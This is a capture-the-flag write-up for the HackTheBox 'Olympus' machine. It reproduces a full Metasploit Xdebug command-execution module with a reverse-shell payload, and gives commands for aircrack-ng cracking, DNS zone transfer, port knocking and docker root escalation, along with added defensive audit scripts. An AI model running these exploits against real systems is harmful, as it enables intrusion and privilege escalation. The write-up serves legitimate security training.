HackTheBox Writeup — Olympus

Faisal Husaini
9 min read · Sep 22, 2018
Olympus

Hello guys, I am Faisal Husaini and this is my writeup on Medium for the Olympus machine, which has now retired; this was also my favorite box on HTB. My username on HTB is “faisalelino”.

This writeup is on the Olympus box, which is one of the hardest boxes on HTB. The experience of solving it was great, as I learned a lot of things along the way.

The IP for this machine is 10.10.10.83, so let’s get started.

NMAP Results

First we do an nmap scan using the command “nmap -sC -sV -oA nmap 10.10.10.83”:

# Nmap 7.70 scan initiated Sun Jun 10 02:19:00 2018 as: nmap -sC -sV -oA nmap 10.10.10.83
Nmap scan report for 10.10.10.83
Host is up (0.19s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
53/tcp open domain (unknown banner: Bind)
| dns-nsid:
|_ bind.version: Bind
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
| bind
|_ Bind
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Crete island — Olympus HTB
85/tcp filtered mit-ml-dev
144/tcp filtered news
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-City of olympia
| ssh-hostkey:
| 2048 f2:ba:db:06:95:00:ec:05:81:b0:93:60:32:fd:9e:00 (RSA)
| 256 79:90:c0:3d:43:6c:8d:72:19:60:45:3c:f8:99:14:bb (ECDSA)
|_ 256 f8:5b:2e:32:95:03:12:a3:3b:40:c5:11:27:ca:71:52 (ED25519)
4004/tcp filtered pxc-roid
9040/tcp filtered tor-trans
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port53-TCP:V=7.70%I=7%D=6/10%Time=5B1C3D7C%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04Bind\xc0\x0c\
SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2222-TCP:V=7.70%I=7%D=6/10%Time=5B1C3D77%P=x86_64-pc-linux-gnu%r(NU
SF:LL,29,"SSH-2\.0-City\x20of\x20olympia\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\r\n");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 10 02:20:18 2018 -- 1 IP address (1 host up) scanned in 78.87 seconds

We see that port 22 (ssh) is filtered and port 80 is open, so let’s open the IP in a browser.

HTTP Service

Nothing interesting here. Let’s look at the source code too.

Source Code of http://10.10.10.83

There is nothing important on the HTTP page, and we got nothing from its source code either, so it’s time for a dirb scan.

Dirb

Dirb Results

We don’t get anything much of use from dirb, so it’s time to run nikto on http://10.10.10.83/.

Nikto

Nikto Results

Nikto says an uncommon header ‘xdebug’ was found, so now let’s google it.

XDebug

About XDebug
XDebug

This is what the official website says about xdebug, so let’s look for an exploit for it, if there is one.

MSF Exploit for XDebug on Exploit-DB by MinatoTW

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
  include Rex::Proto::Http
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'xdebug Unauthenticated OS Command Execution',
      'Description'    => %q{
        Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
        This allows the attacker to execute arbitrary php code as the context of the web user.
      },
      'DisclosureDate' => 'Sep 17 2017',
      'Author'         => [
        'Ricter Zheng',   # Discovery https://twitter.com/RicterZ
        'Taki Tachibana', # MinatoTW
        'Mumbai'          # Austin Hudson
      ],
      'References'     => [
        ['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
        ['URL', 'https://paper.seebug.org/397/']
      ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'php',
      'Arch'           => [ARCH_PHP],
      'DefaultTarget'  => 0,
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'DefaultOptions' => {
        'PAYLOAD' => 'php/meterpreter/reverse_tcp'
      },
      'Payload'        => {
        'DisableNops' => true,
      },
      'Targets'        => [[ 'Automatic', {} ]],
    ))

    register_options([
      OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
      OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
      OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
      Opt::RPORT(80),
      OptString.new('WriteableDir', [ true, "A writeable directory on the target", "/tmp"])
    ])
  end

  def check
    begin
      res = send_request_cgi({
        'uri'      => datastore["PATH"],
        'method'   => 'GET',
        'vars_get' => {
          'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
        }
      })
      vprint_status "Request sent\n#{res.headers}"
      if res && res.headers.to_s =~ /XDEBUG/i
        vprint_good("Looks like remote server has xdebug enabled\n")
        return CheckCode::Detected
      else
        return CheckCode::Safe
      end
    rescue Rex::ConnectionError
      return CheckCode::Unknown
    end
  end

  def exploit
    payl = Rex::Text.encode_base64("#{payload.encoded}")
    file = "#{datastore['WriteableDir']}" + "/" + rand_text_alphanumeric(5)
    cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("file_put_contents(\"#{file}\",base64_decode(\"#{payl}\")) && system(\" php #{file} \")") + "\x00"
    webserver = Thread.new do
      begin
        server = Rex::Socket::TcpServer.create(
          'LocalPort' => datastore['SRVPORT'],
          'LocalHost' => datastore['SRVHOST'],
          'Context'   => {
            'Msf'        => framework,
            'MsfExploit' => self
          })

        client = server.accept
        print_status("Waiting for client response.")
        data = client.recv(1024)
        print_status("Receiving response")
        vprint_line(data)
        print_status("Shell might take upto a minute to respond.Please be patient.")
        print_status("Sending payload of size #{cmd1.length} bytes")
        register_file_for_cleanup(file)
        client.write(cmd1)
        client.close
        server.close
        webserver.exit
      ensure
        webserver.exit
      end
    end
    send_request_cgi({
      'uri'     => datastore['PATH'],
      'method'  => 'GET',
      'headers' => {
        'X-Forwarded-For' => "#{lhost}",
        'Cookie'          => 'XDEBUG_SESSION=' + rand_text_alphanumeric(10)
      }
    })
  end
end
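The module’s check method finds Xdebug from the outside; on the server the same exposure is visible in php.ini. This is an added example, not from the writeup or the exploit-db module: it audits Xdebug 2.x settings (the versions the module targets) and flags the combination the module depends on, remote debugging enabled with the callback host taken from request headers, with a constructed weak config beside a hardened one.

```python
import re

# Constructed sample of the exposed php.ini settings (Xdebug 2.x names).
WEAK_INI = """\
; constructed: remote debugging on, callback host chosen by the client
zend_extension=xdebug.so
xdebug.remote_enable=1
xdebug.remote_connect_back=1
xdebug.remote_autostart=0
"""

# Constructed sample of a safer configuration for the same host.
HARDENED_INI = """\
; constructed: remote debugging off, callback pinned to localhost anyway
zend_extension=xdebug.so
xdebug.remote_enable=0
xdebug.remote_connect_back=0
xdebug.remote_host=127.0.0.1
"""

def parse_ini(text):
    """Return {key: value} for simple key=value lines, dropping ';' comments."""
    settings = {}
    for line in text.splitlines():
        line = line.split(';', 1)[0].strip()
        if '=' in line:
            key, value = line.split('=', 1)
            settings[key.strip().lower()] = value.strip().strip('"')
    return settings

def truthy(value):
    return value.lower() in ('1', 'on', 'true', 'yes')

def audit_xdebug(text):
    """Return a list of findings; an empty list means nothing to flag."""
    cfg = parse_ini(text)
    findings = []
    if not truthy(cfg.get('xdebug.remote_enable', '0')):
        return findings  # remote debugging off: no DBGp session is ever opened
    findings.append('xdebug.remote_enable=1: any client can start a DBGp session')
    if truthy(cfg.get('xdebug.remote_connect_back', '0')):
        findings.append('xdebug.remote_connect_back=1: callback host is taken from '
                        'X-Forwarded-For / REMOTE_ADDR, so the client picks the debugger')
    host = cfg.get('xdebug.remote_host', 'localhost')  # Xdebug 2.x default
    if host not in ('localhost', '127.0.0.1', '::1'):
        findings.append(f'xdebug.remote_host={host}: debugger callback leaves the host')
    if truthy(cfg.get('xdebug.remote_autostart', '0')):
        findings.append('xdebug.remote_autostart=1: every request opens a debug session')
    return findings
```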

Exploiting XDebug using MSFConsole

We have to set RHOST to 10.10.10.83 and LHOST to our tun0 IP address, then run the exploit command.

Meterpreter

Bingo! We got a meterpreter session, now let’s move on and look at the contents.

Digging into Meterpreter

Nothing much here, let’s see the contents of the Zeus user’s home.

We see something like git folders, airgeddon.sh, a folder named captured, etc.

Let’s look at the contents of airgeddon.sh; it’s a very long bash script, so nothing interesting there. Now let’s dive into the captured folder.

We find a .cap file, which we download using our meterpreter shell.

Now let’s crack this captured.cap file using aircrack-ng.

Cracking CAP file using Aircrack-ng

We crack the captured.cap file using the tool aircrack-ng.

Command used: aircrack-ng captured.cap -w rockyou.txt, then we wait for the cracking to finish.

aircrack-ng

We got the key, which is “flightoficarus”.

This was a bit tricky to understand. Then I realised that the word Icarus is Greek, which this box is themed on, and from the nmap results we saw that ssh is open on port 2222, so Icarus may be the username. But what about the password?

After asking a friend for a hint, he told me to look at the captured.cap file, so I thought the word “captured” might be the password, but no!

Then I opened the captured.cap file using Wireshark.

Opening captured.cap file using Wireshark

We see something like a sentence that may be the password: “Too_cl0se_to_th3_Sun”. Now we copy this and connect to ssh.

Connecting to SSH on Port 2222

We connect to ssh using this command:

ssh icarus@10.10.10.83 -p2222

ssh connection successful

Bingo, we got into ssh. Let’s see what’s inside the home folder with the “ls” command.

We see a txt file named help_of_the_gods.txt, and inside it we got a DNS name, so I will copy it to my /etc/hosts file with the IP 10.10.10.83.

DIG

I tried a lot of things; when opening ctfolympus.htb in the browser, it displayed the same thing as when using the IP.

So after asking my friend for help, he told me to use dig.

So I used dig with “dig axfr ctfolympus.htb @10.10.10.83”, and we get:

Zone Transfers

In the TXT record we see “St34l_th3_F1re!”, which is similar in style to the password for Icarus we got from captured.cap.

But what about the username? We see “prometheus” in the same TXT record, but when we tried it on ssh port 2222, it failed to connect.
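The zone transfer worked because the server allowed AXFR to anyone. This is an added example, not from the writeup: a check a DNS admin would run over named.conf text to find zones whose allow-transfer is unset or open to any; the configuration is constructed, and an unset allow-transfer is treated as open, which is the classic BIND 9 default.

```python
import re

OPEN = {'any', '0.0.0.0/0', '::/0'}   # ACL entries that hand the zone to every client

# constructed named.conf: the global ACL is open and the first zone inherits it
NAMED_CONF = """\
options {
    directory "/var/cache/bind";
    allow-transfer { any; };
};
zone "ctfolympus.htb" {
    type master;
    file "/etc/bind/db.ctfolympus.htb";
};
zone "internal.example" {
    type master;
    allow-transfer { 10.0.0.2; };
};
"""

def blocks(conf, keyword):
    """Yield (label, body) for each `keyword "label" { ... }` statement, counting braces."""
    for m in re.finditer(r'\b%s\b(?:\s+"([^"]+)")?[^{;]*\{' % keyword, conf):
        depth, i = 1, m.end()
        while i < len(conf) and depth:
            depth += {'{': 1, '}': -1}.get(conf[i], 0)
            i += 1
        yield m.group(1) or '', conf[m.end():i - 1]

def transfer_acl(body):
    """Return the allow-transfer entries in a block body, or None if not set there."""
    m = re.search(r'allow-transfer\s*\{([^}]*)\}', body)
    if not m:
        return None
    return [entry.strip() for entry in m.group(1).split(';') if entry.strip()]

def audit_transfers(conf):
    """Return {zone: reason} for zones whose AXFR policy is missing or open to any host."""
    global_acl = None
    for _, body in blocks(conf, 'options'):
        global_acl = transfer_acl(body)          # zone-level ACL overrides this
    findings = {}
    for name, body in blocks(conf, 'zone'):
        acl = transfer_acl(body)
        if acl is None:
            acl = global_acl
        if acl is None:
            findings[name] = 'no allow-transfer anywhere (classic BIND 9 default is any)'
        elif OPEN & set(acl):
            findings[name] = 'allow-transfer includes ' + ', '.join(sorted(OPEN & set(acl)))
    return findings
```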

Also, port 22 was filtered. At that point I didn’t know about port knocking; my friend helped by telling me to watch IppSec’s Nineveh video.

From that I learned about port knocking, and now we get to that part.

Port Knocking

I created a simple bash command for the port knocking.

After watching the Nineveh video from IppSec, I saw that he used 3 ports from iptables or something, which I didn’t have in this box.

So what to do?

Remember the TXT record we got from dig? It said portal to Hades and then 3 numbers.

portal

These are the 3 ports to be used for port knocking, i.e. 3456, 8234, 62431.

So I used this command for knocking and then directly connect to ssh on port 22:

for i in 3456 8234 62431; do nmap -Pn -p $i --host-timeout 201 --max-retries 0 10.10.10.83; done; ssh prometheus@10.10.10.83

Port Knocking SSH

Now it connects to ssh without the port being filtered; we enter the password, which was “St34l_th3_F1re!”.
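To see the knock from the listening side, here is an added example that is not from the writeup: the per-source state machine a knock daemon keeps, using the box’s sequence 3456, 8234, 62431 and an assumed 10-second window. A wrong port or a stale partial sequence resets the source; the traffic fed to it is constructed.

```python
KNOCK_SEQUENCE = (3456, 8234, 62431)   # the portal-to-Hades ports from the TXT record
KNOCK_TIMEOUT = 10.0                   # assumed: seconds allowed for the whole sequence

class KnockTracker:
    """Track partial knock sequences per source IP from observed connection attempts."""

    def __init__(self, sequence=KNOCK_SEQUENCE, timeout=KNOCK_TIMEOUT):
        self.sequence = tuple(sequence)
        self.timeout = timeout
        self.progress = {}   # src_ip -> (index of next expected port, time of first knock)

    def observe(self, src_ip, dst_port, ts):
        """Feed one attempt; return True when src_ip has completed the sequence."""
        idx, started = self.progress.get(src_ip, (0, ts))
        if idx and ts - started > self.timeout:
            idx, started = 0, ts               # stale partial sequence: start over
        if dst_port == self.sequence[idx]:
            idx += 1
            if idx == len(self.sequence):
                del self.progress[src_ip]      # completed: here a daemon would open port 22
                return True
            self.progress[src_ip] = (idx, started)
        else:
            self.progress.pop(src_ip, None)    # any other port resets the sequence
        return False

def replay(events, tracker=None):
    """Run (src_ip, dst_port, ts) events; return the sources that completed the knock."""
    tracker = tracker or KnockTracker()
    return [ip for ip, port, ts in events if tracker.observe(ip, port, ts)]

# constructed traffic: 10.10.14.5 knocks in order, 10.10.14.9 knocks out of order,
# 10.10.14.7 knocks in order but lets the window expire before the last port
SAMPLE_EVENTS = [
    ("10.10.14.5", 3456, 0.0), ("10.10.14.9", 3456, 0.1), ("10.10.14.7", 3456, 0.2),
    ("10.10.14.5", 8234, 0.5), ("10.10.14.9", 62431, 0.6),
    ("10.10.14.5", 62431, 1.0), ("10.10.14.7", 8234, 2.0),
    ("10.10.14.7", 62431, 15.0),
]

if __name__ == "__main__":
    print(replay(SAMPLE_EVENTS))   # ['10.10.14.5']
```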

Connection Successful

And we get in, now let’s get the user flag.

User Flag

The user flag was in the same directory, so we do the ls command and then cat “user.txt”, and we get the flag.

User Flag

Bingo, now time for root.

Privilege Escalation

Let’s import the LinEnum.sh script from my local machine, then run it and see the results.

We were not able to run the sudo command as prometheus, so after the script execution completed, we saw only one interesting thing.

LinEnum.sh

The user was hosting docker, which may be a hint towards docker privilege escalation, so after searching on google for docker privilege escalation, I found:

docker run [tab tab] to see the images
docker run -t -i olympia /bin/bash
docker run -v /root:/root -i -t olympia /bin/bash

So I ran the last command and then got the root flag.

Docker Priv Esc

We got root, now it’s time to get the root flag, which is located in /root/root.txt.

Remember the 3 docker commands I gave above; use the 3rd one to get the flag.
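The escalation works because the docker group grants root-equivalent access to anyone in it. This is an added example, not from the writeup: two checks a host owner would run, listing docker group members from /etc/group and flagging docker run command lines (from shell history or auditd exec logs) that bind-mount sensitive host paths, as the -v /root:/root command above does. The group text, the command lines and the SENSITIVE list are constructed.

```python
import shlex

# host paths whose exposure inside a container hands over the host (assumed list)
SENSITIVE = ('/root', '/etc', '/home', '/var/run/docker.sock')

def docker_group_members(group_text):
    """Return the members of the docker group from /etc/group-style text."""
    for line in group_text.splitlines():
        fields = line.split(':')
        if len(fields) == 4 and fields[0] == 'docker':
            return [m for m in fields[3].split(',') if m]
    return []

def host_mounts(cmdline):
    """Return absolute host paths that a `docker run` command line bind-mounts."""
    argv = shlex.split(cmdline)
    paths = []
    if argv[:2] != ['docker', 'run']:
        return paths
    def add(spec):                     # spec is "host:container[:opts]"
        host = spec.split(':')[0]
        if host.startswith('/'):       # a relative name is a named volume, not a host path
            paths.append(host)
    for i, arg in enumerate(argv):
        if arg in ('-v', '--volume') and i + 1 < len(argv):
            add(argv[i + 1])
        elif arg.startswith(('-v=', '--volume=')):
            add(arg.split('=', 1)[1])
        elif arg == '--mount' and i + 1 < len(argv):
            opts = dict(kv.split('=', 1) for kv in argv[i + 1].split(',') if '=' in kv)
            if opts.get('type') == 'bind':
                add(opts.get('source') or opts.get('src', ''))
    return paths

def risky_mounts(cmdline):
    """Subset of host_mounts() that exposes the host root or a SENSITIVE path."""
    risky = []
    for p in host_mounts(cmdline):
        p = p.rstrip('/') or '/'
        if p == '/' or any(p == s or p.startswith(s + '/') for s in SENSITIVE):
            risky.append(p)
    return risky

# constructed inputs; the first command line is the one used on the box
GROUP_TEXT = "root:x:0:\ndocker:x:999:prometheus\n"
CMDS = [
    "docker run -v /root:/root -i -t olympia /bin/bash",
    "docker run --mount type=bind,source=/,target=/host alpine sh",
    "docker run -v appdata:/data -v /srv/app:/app myimage",
]
```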

Root Flag

Root Flag

This machine was really awesome and I gained a lot of knowledge from it, like port knocking, docker privilege escalation, etc.

Vulnerabilities used to solve this box:

  1. XDebug Exploitation
  2. Zone Transfers
  3. Port Knocking
  4. Docker Privilege Escalation

References

XDebug Exploit by MinatoTW on HTB → https://www.exploit-db.com/exploits/44568/

Ippsec’s Nineveh Video for Port Knocking → https://www.youtube.com/watch?v=K9DKULxSBK4

Docker Privilege Escalation → https://fosterelli.co/privilege-escalation-via-docker.html

Faisal Husaini

Hacker | Red Teamer | Python Coder | Gamer | Reverse Engineering Lover